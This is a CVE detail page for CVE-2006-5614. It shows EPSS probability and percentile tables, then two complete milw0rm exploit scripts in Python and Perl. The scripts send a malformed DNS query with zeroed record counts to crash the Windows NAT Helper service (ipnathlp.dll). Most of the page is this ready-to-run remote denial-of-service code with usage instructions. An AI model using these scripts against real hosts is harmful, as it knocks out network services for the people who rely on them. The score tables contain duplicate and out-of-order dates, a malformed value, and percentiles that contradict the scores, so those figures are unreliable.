CVE-2006-5614 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	83.54%	–	–
2023-03-12	–	–	–	97.18%	–
2023-04-09	–	–	–	97.13%	–
2023-05-14	–	–	–	97.08%	–
2023-07-30	–	–	–	97.09%	–
2023-09-03	–	–	–	97.12%	–
2023-11-19	–	–	–	97.08%	–
2023-12-31	–	–	–	97%	–
2024-02-04	–	–	–	97.03%	–
2024-03-31	–	–	–	97.07%	–
2024-05-12	–	–	–	97.03%	–
2024-06-02	–	–	–	97.03%	–
2024-09-22	–	–	–	97.06%	–
2024-12-22	–	–	–	96.84%	–
2025-02-23	–	–	–	96.53%	–
2025-01-19	–	–	–	96.84%	–
2025-02-23	–	–	–	96.53%	–
2025-03-18	–	–	–	–	87.94%
2025-03-30	–	–	–	–	88.35%
2025-03-30	–	–	–	–	88.35,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-09	1%
2023-05-14	1%
2023-07-30	1%
2023-09-03	1%
2023-11-19	1%
2023-12-31	1%
2024-02-04	1%
2024-03-31	1%
2024-05-12	1%
2024-06-02	1%
2024-09-22	1%
2024-12-22	1%
2025-02-23	1%
2025-01-19	1%
2025-02-23	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

#!/usr/bin/python # Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit # Bug discovered by h07 <h07@interia.pl> # Tested on XP SP2 Polish # Details: # # Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..] # # [Process svchost.exe, module ipnathlp] # --> MOV DL, [EAX] # Exception C0000005 (ACCESS_VIOLATION reading [00000000]) ## from socket import * from time import sleep host = "192.168.0.1" port = 53 buffer = ( # DNS (query) "\x6c\xb6" # Transaction ID: 0x6cb6 "\x01\x00" # Flags: 0x0100 (Standard query) "\x00\x00" # Questions: 0 "\x00\x00" # Answer RRs: 0 "\x00\x00" # Authority RRs: 0 "\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0) "\x03\x77\x77\x77" # "\x06\x67\x6f\x6f" # "\x67\x6c\x65\x03" # "\x63\x6f\x6d\x00" # Name: www.google.com "\x00\x01" # Type: A (Host address) "\x00\x01" # Class: IN (0x0001) ) s = socket(AF_INET, SOCK_DGRAM) s.connect((host, port)) s.send(buffer) sleep(1) s.close() # EoF # milw0rm.com [2006-10-28]

#!/usr/bin/perl ## ## Microsoft Windows NAT Helper Components Remote DoS Exploit (2) ## ************************************************************** ## ## .details ## -------- ## Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..] ## ## .info ## ----- ## code by x82 <x82_ [at] bk [dot] ru> ## bug by h07 <h07 [at] interia [dot] pl> ## ## .greetz ## ------- ## ... goes out to triple6, wolf, lux2, EaTh, darkkilla, 2letterman .. ;) ## ## use warnings; use diagnostics; use strict; use IO::Socket; my $host = $ARGV[0]; # 192.168.0.1 my $port = 53; # standard port my $payload = # by h07 "\x6c\xb6". "\x01\x00". "\x00\x00". "\x00\x00". "\x00\x00". "\x00\x00". # <-- Bug is here 0x0000 "\x03\x77\x77\x77". "\x06\x67\x6f\x6f". "\x67\x6c\x65\x03". "\x63\x6f\x6d\x00". "\x00\x01". "\x00\x01"; my $length = length($payload); if((! $host || $host !~ /^\d{1,3}(\.\d{1,3}){3}$/)) { print "\n----------------------------------------------------------------------\n"; print "Microsoft Windows NAT Helper Components Remote DoS Exploit\n"; print "exploit by x82 <x82_ [at] bk [dot] ru>\n"; print "bug discovered by h07 <h07 [at] interia [dot] pl>\n"; print "----------------------------------------------------------------------"; print "\n"; print "usage: perl $0 192.168.0.1\n"; exit; } my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port); unless ($socket) { die "[-] Can\'t connect to $host" } print "\n"; print "[+] connection established\n"; print "[*] Sending payload ..." . "(size: $length)\n"; sleep(5); print $socket $payload; print "[+] ok - payload sent\n"; ## 29.10.2006 # milw0rm.com [2006-10-30]